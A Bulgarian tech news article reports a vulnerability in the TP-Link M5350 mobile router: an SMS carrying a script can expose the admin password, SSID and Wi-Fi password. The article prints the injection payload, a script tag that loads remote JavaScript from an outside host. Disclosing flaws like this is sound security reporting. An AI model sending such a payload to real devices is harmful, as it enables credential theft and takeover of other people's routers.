Чрез изпращането на един SMS до SIM картата на устройството е възможно да се получи паролата на администраторския акаунт, както и паролата за Wi-Fi достъпа.
Германският специалист Ян Херш (Jan Hörsch) съобщи за коварна уязвимост в маршрутизатор на китайската компания TP-Link, чрез която може да се получи паролата за достъп до устройството чрез изпращането на SMS съобщение към SIM картата на маршрутизатора, съдържащо специален скрипт.
Проблемът засяга безжичния мобилен маршрутизатор TP-Link M5350, който мобилните оператори по правило предлагат на своите клиенти заедно със SIM картата, поставена в маршрутизатора. Тази SIM карта свързва маршрутизатора с мобилната мрежа на оператора и като всяка друга SIM карта си има свой телефонен номер.
Херш откри уязвимостта във функцията за обработка на постъпващите SMS съобщения. Той допълва, че ако се изпрати късо съобщение, съдържащо скрипта:
< script src=//n.ms/a.js >< /script >,
може да се получи достъп до администраторския акаунт на устройството, идентификатора на безжичната мрежа (SSID) и паролата на Wi-Fi мрежата.
Според специалиста, заплахата не е толкова голяма, колкото изглежда, понеже за да се използва тази уязвимост, е необходимо да се знае телефонния номер на SIM картата.
Всичко важно от света на технологиите, директно в пощата ти.
С абонирането приемате нашите Условия и Политика за поверителност. Може да се отпишете с един клик по всяко време.
Коментирайте статията в нашите Форуми. За да научите първи най-важното, харесайте страницата ни във Facebook, и ни последвайте в Google Новини, TikTok, Telegram и Viber или изтеглете приложението на Kaldata.com за Android, iPhone, Huawei, Google Chrome, Microsoft Edge и Opera!
















